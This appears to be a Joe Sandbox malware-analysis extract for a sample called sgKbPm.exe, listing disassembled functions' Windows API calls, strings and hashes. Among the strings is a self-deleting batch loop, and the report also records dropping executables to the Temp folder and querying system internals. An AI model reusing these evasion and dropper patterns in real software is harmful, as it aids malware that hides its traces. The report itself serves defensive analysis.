                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                              • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                              • API String ID: 692489704-613076915
                              • Opcode ID: acacf3a58b377753a5b5485bdb43c105a95de151d29e2df11a2b6d019d1d222e
                              • Instruction ID: de4bdcffd1d5c1656d5a839a000306ab77de3c05477c93737ad05ac937aa8569
                              • Opcode Fuzzy Hash: acacf3a58b377753a5b5485bdb43c105a95de151d29e2df11a2b6d019d1d222e
                              • Instruction Fuzzy Hash: ED2156BE94035C7BDB10D7A49C89FDB73ACDB0474AF4005A1BE44E2082E6709FC84A68
                              APIs
                                • Part of subcall function 00C5185B: GetSystemTimeAsFileTime.KERNEL32(00C51F92,00000000,?,00000000,?,?,?,00C51F92,?,00000000,00000002), ref: 00C51867
                                • Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51878
                                • Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51880
                                • Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51890
                                • Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51894
                              • wsprintfA.USER32 ref: 00C515AA
                              • wsprintfA.USER32 ref: 00C515C6
                              • lstrlen.KERNEL32(?), ref: 00C515D2
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00C515EE
                              • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00C51609
                              • CloseHandle.KERNEL32(00000000), ref: 00C51612
                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C5162D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                              • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\sgKbPm.exe$open
                              • API String ID: 617340118-1352319835
                              • Opcode ID: 7c37f6cf7831bb1db218888af5e15606f2583b34a7a84232e3978680548bf478
                              • Instruction ID: df89516e30a7a3d4e52666c52d28e28abb684ed64488a5bdb166cee82defeafb
                              • Opcode Fuzzy Hash: 7c37f6cf7831bb1db218888af5e15606f2583b34a7a84232e3978680548bf478
                              • Instruction Fuzzy Hash: ED11547A9012687AD72097A59C8DFEF7A6CDF59792F040061FD49E2041DA709BC88BB4
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00C51400), ref: 00C51226
                              • GetProcAddress.KERNEL32(00000000), ref: 00C5122D
                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00C51400), ref: 00C5123F
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00C51400), ref: 00C51250
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,00C51400), ref: 00C5129E
                              • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,00C51400), ref: 00C512B0
                              • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\sgKbPm.exe,?,?,?,?,00C51400), ref: 00C512F5
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00C51400), ref: 00C5130A
                              Strings
                              • ZwQuerySystemInformation, xrefs: 00C51212
                              • ntdll.dll, xrefs: 00C51219
                              • C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C51262
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                              • String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe$ZwQuerySystemInformation$ntdll.dll
                              • API String ID: 1500695312-1505229931
                              • Opcode ID: bf17d8526c489be5ec67059140286748e72f0714904c23a0942c488e72c45dad
                              • Instruction ID: 91e58c5f50c8415fb8f670415c61cd9eafb8634b0a35e57a01df0410c3c911ee
                              • Opcode Fuzzy Hash: bf17d8526c489be5ec67059140286748e72f0714904c23a0942c488e72c45dad
                              • Instruction Fuzzy Hash: 1F210679705351ABD7209F65CC0CB6FBAA8FB85B52F080918FD55E6280C770DAC8C7A9
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7591E800,?,?,00C529DB,?,00000001), ref: 00C526A7
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,7591E800,?,?,00C529DB,?,00000001), ref: 00C526B5
                              • lstrlen.KERNEL32(?), ref: 00C526C4
                              • ??2@YAPAXI@Z.MSVCRT(-00000005), ref: 00C526CE
                              • lstrcpy.KERNEL32(00000004,?), ref: 00C526E3
                              • lstrcpy.KERNEL32(?,00000004), ref: 00C5271F
                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00C5272D
                              • SetEvent.KERNEL32 ref: 00C5273C
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                              • String ID:
                              • API String ID: 41106472-0
                              • Opcode ID: 6ba416cac157051960009bbf8830f7869acfd0498817dc2f2ad28614f18cdb42
                              • Instruction ID: 9b3d8f6864551d9f76631e5bfba2f6c3a568ad640d76a88416f8b0df191b2991
                              • Opcode Fuzzy Hash: 6ba416cac157051960009bbf8830f7869acfd0498817dc2f2ad28614f18cdb42
                              • Instruction Fuzzy Hash: CC11AC3E400300AFCB229F15EC48B6EBBF9FB967A77104016F854A7160D7709AC9EB54
                              APIs
                              • srand.MSVCRT ref: 00C51BCD
                              • rand.MSVCRT ref: 00C51BD8
                              • memset.MSVCRT ref: 00C51C43
                              • memcpy.MSVCRT(?,LoSZWWEUdpfxdJFubCxyDnfDtvPIcvAtcbhLFmTbzLlPeHjiRuUwMUZRtrEVSVpgnQkHXqwKVusBqGhXkyKaCyNmdawrogOzKfxsNYYSCPXIBrjNTeDsjIQRFYeTiOiJpoAavMgHZzOckhlBWmGnMQGqAEJl,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00C51C4F
                              • lstrcat.KERNEL32(?,.exe), ref: 00C51C5D
                              Strings
                              • LoSZWWEUdpfxdJFubCxyDnfDtvPIcvAtcbhLFmTbzLlPeHjiRuUwMUZRtrEVSVpgnQkHXqwKVusBqGhXkyKaCyNmdawrogOzKfxsNYYSCPXIBrjNTeDsjIQRFYeTiOiJpoAavMgHZzOckhlBWmGnMQGqAEJl, xrefs: 00C51B8A, 00C51B9C, 00C51C15, 00C51C49
                              • .exe, xrefs: 00C51C57
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: lstrcatmemcpymemsetrandsrand
                              • String ID: .exe$LoSZWWEUdpfxdJFubCxyDnfDtvPIcvAtcbhLFmTbzLlPeHjiRuUwMUZRtrEVSVpgnQkHXqwKVusBqGhXkyKaCyNmdawrogOzKfxsNYYSCPXIBrjNTeDsjIQRFYeTiOiJpoAavMgHZzOckhlBWmGnMQGqAEJl
                              • API String ID: 122620767-3278051682
                              • Opcode ID: ba2020e053f5c763a7a680130f33be459c9b7ce84c2b6d220797f46795e78360
                              • Instruction ID: 5c5caa3c2ee488f062e8b9589c07aa04ba54aa2c4341b4070d97e739ac93bc86
                              • Opcode Fuzzy Hash: ba2020e053f5c763a7a680130f33be459c9b7ce84c2b6d220797f46795e78360
                              • Instruction Fuzzy Hash: 7D214C3EE443D06FD21A1336AC45B6D3B54DFE3B17F190099FD952B1D2D1640AC9C268
                              APIs
                              • memset.MSVCRT ref: 00C518B1
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75920F00,75A78400), ref: 00C518D3
                              • CloseHandle.KERNEL32(00C52549), ref: 00C518E9
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C518F0
                              • GetExitCodeProcess.KERNEL32(?,00C52549), ref: 00C51901
                              • CloseHandle.KERNEL32(?), ref: 00C5190A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                              • String ID:
                              • API String ID: 876959470-0
                              • Opcode ID: 9cda2d82420e4b4a2b8e1ca2b74664412d68e1bb4d6075fd2d42960ed6c7ec98
                              • Instruction ID: 36402daa925a7809d8e4e7ba217c5b5776f27e1ca41c9b751d68e45c91464f41
                              • Opcode Fuzzy Hash: 9cda2d82420e4b4a2b8e1ca2b74664412d68e1bb4d6075fd2d42960ed6c7ec98
                              • Instruction Fuzzy Hash: EB01717A901268BBCB216B95DC48EDFBF7DEF85761F104021F915A51A0D6314A98CAA0
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00C51334
                              • GetProcAddress.KERNEL32(00000000), ref: 00C5133B
                              • memset.MSVCRT ref: 00C51359
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcmemset
                              • String ID: NtSystemDebugControl$ntdll.dll
                              • API String ID: 3137504439-2438149413
                              • Opcode ID: f36db431a8933311166b917a2f6ee31b5c4c4525bf6f7eddea4eaa9d1e599d91
                              • Instruction ID: 8ac92f6d976b1771bd1bf66576fab922bc8aa1770ec82fb85ce6aa1fae2dcd35
                              • Opcode Fuzzy Hash: f36db431a8933311166b917a2f6ee31b5c4c4525bf6f7eddea4eaa9d1e599d91
                              • Instruction Fuzzy Hash: 4401617960034DAFDB10DFA4AC89B6FBBACFB41316F04452AFD11A1150D27096D9CA55
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: strrchr$lstrcmpilstrcpylstrlen
                              • String ID:
                              • API String ID: 3636361484-0
                              • Opcode ID: 0854985365dee728b2ce44774e4546ea5d7617619979d42b56069c063da0290c
                              • Instruction ID: 73a1f77473d73ca4a354ea2bb538da6b6b548ceb4b1b98da253c4affe78e5111
                              • Opcode Fuzzy Hash: 0854985365dee728b2ce44774e4546ea5d7617619979d42b56069c063da0290c
                              • Instruction Fuzzy Hash: 7501D6BA9043596FEB215760EC4DBDB779CDB04356F080066EE45E30D0EBB49EC88BA4
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00C51F92,00000000,?,00000000,?,?,?,00C51F92,?,00000000,00000002), ref: 00C51867
                              • srand.MSVCRT ref: 00C51878
                              • rand.MSVCRT ref: 00C51880
                              • srand.MSVCRT ref: 00C51890
                              • rand.MSVCRT ref: 00C51894
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: Timerandsrand$FileSystem
                              • String ID:
                              • API String ID: 4106363736-0
                              • Opcode ID: b72cbd0b31d65644e050b8ce6b165f6443a0e34da8baa06e56eff3ef81dd389e
                              • Instruction ID: a61f84d902666023185f66b88e9d83c5f13683ca31dbf39cf7c026320165163f
                              • Opcode Fuzzy Hash: b72cbd0b31d65644e050b8ce6b165f6443a0e34da8baa06e56eff3ef81dd389e
                              • Instruction Fuzzy Hash: 55E041775103187BD70057F9EC46A9EB7ACDEC41717110567F500E3154E574FD848674